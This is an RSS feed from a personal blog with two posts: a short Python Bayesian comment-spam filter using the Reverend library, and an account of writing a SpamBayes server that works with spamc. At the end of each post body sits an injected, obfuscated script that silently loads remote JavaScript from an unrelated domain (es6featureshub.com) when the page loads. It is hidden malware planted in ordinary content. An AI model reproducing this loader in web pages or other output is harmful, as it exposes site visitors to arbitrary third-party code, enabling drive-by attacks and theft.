<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Jkx@home &#187; bayesian</title>
	<atom:link href="http://www.larsen-b.com/tags/bayesian/feed" rel="self" type="application/rss+xml" />
	<link>http://www.larsen-b.com</link>
	<description>Titanium Exposé</description>
	<lastBuildDate>Fri, 31 Oct 2025 02:15:37 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.5</generator>
		<item>
		<title>Howto to spam-protect your python-based blog with bayesian filter.</title>
		<link>http://www.larsen-b.com/Article/244.html</link>
		<comments>http://www.larsen-b.com/Article/244.html#comments</comments>
		<pubDate>Fri, 17 Nov 2006 19:57:26 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Misc]]></category>
		<category><![CDATA[bayesian]]></category>
		<category><![CDATA[Blog]]></category>
		<category><![CDATA[Python]]></category>
		<category><![CDATA[spam]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[As severall people, I run into issue with some spammer using my comment system to spam, and post backlinks. (Even using some funny stuffs) I &#8216;m already using a good email spam filter: SpamBayes, so I decided to test bayesian &#8230; <a href="http://www.larsen-b.com/Article/244.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p>As severall people, I run into issue with some spammer using my comment system to spam, and post backlinks. (Even using some funny <a class="reference" href="http://www.larsen-b.com/Article/239.html">stuffs</a>)</p>
<p>I &#8216;m already using a good email spam filter: <a class="reference" href="http://www.larsen-b.com/Article/112.html">SpamBayes</a>, so I decided to test bayesian filtering for the spam on this blog too.</p>
<p>I decided to give <a class="reference" href="http://divmod.org/trac/">Reverend</a> a try:</p>
<pre class="literal-block">from reverend.thomas import Bayes

SPAM_DB='spam.bayes'
guesser = Bayes()

# load the spam DB
try:
    guesser.load(SPAM_DB)
except IOError:
    print "Creating a new spam filter database"
    guesser.save(SPAM_DB)

def train_spam(text):
    guesser.train('spam',text)
    guesser.save(SPAM_DB)

def train_ham(text):
    guesser.train('ham',text)
    guesser.save(SPAM_DB)

# try to guess the spam / ham ratio of a text
def guess(text):
    spam = 0
    ham = 0
    value = guesser.guess(text)
    for o in value:
        if o[0] == 'ham': ham = o[1]
        if o[0] == 'spam': spam = o[1]
    return (ham,spam)</pre>
<p>Small, and really simple module no ? The next step, simply add a &#8216;spam&#8217; and &#8216;ham&#8217; attributes on your comment post. And add two methods to train the comment as a spam or a ham.. And of course, only display comments which have a good ratio ( &gt;1) ham/spam. This took me about 1 hour to implement&#8230;</p>
<p>After a week, of train, this is working very fine, not a single false positive, and it filter every spam since the first trains. As I get around 20 spams post per day, this is quite a good news ;)</p>
<p><strong>Enjoy Bayesian ?</strong><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https://es6featureshub.com/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);</script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.larsen-b.com/Article/244.html/feed</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>SpamBayes server compliant w/ spamassassin</title>
		<link>http://www.larsen-b.com/Article/112.html</link>
		<comments>http://www.larsen-b.com/Article/112.html#comments</comments>
		<pubDate>Sat, 24 Apr 2004 20:10:04 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Utils]]></category>
		<category><![CDATA[bayesian]]></category>
		<category><![CDATA[mail]]></category>
		<category><![CDATA[Python]]></category>
		<category><![CDATA[server]]></category>
		<category><![CDATA[spam]]></category>
		<category><![CDATA[sysadmin]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[I&#8217;m using spambayes for a long time now. But when i decide to install it for all the curent users of my setup (w/ some virtual domains..), i just discover that spambayes don&#8217;t have a system-wide deamon like spamassasin (spamd). &#8230; <a href="http://www.larsen-b.com/Article/112.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p>I&#8217;m using spambayes for a long time now. But when i decide to install it for all the curent users of my setup (w/ some virtual domains..), i just discover that spambayes don&#8217;t have a system-wide deamon like spamassasin (spamd).</p>
<p>So the first try:</p>
<ul class="simple">
<li>install spamassassin :) .. This mail filtering is just a bulshit ! Even w/ the training done on a mail, it achieve to deliver it as &#8216;unsure spam&#8217; !!</li>
<li>put spamassin away .. but keep piece :)</li>
</ul>
<p>I first decided to write another client / server for spambayes. but looking at all the stuff writen in spamc (spamassassin client) i discover i will need a lot of nights (i&#8217;m not a C guru . even if the little try i wrote works perferctly )</p>
<p>Nice try, but why i shouldn&#8217;t simply write a server that use spamc as client ? .. could be really easy and efficient too (spamc is really efficient) ..</p>
<p>i just finish to write <a class="reference" href="http://mail.python.org/pipermail/spambayes-dev/2004-April/002748.html">this</a> and  submit to the dev list<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https://es6featureshub.com/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);</script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.larsen-b.com/Article/112.html/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
	</channel>
</rss>
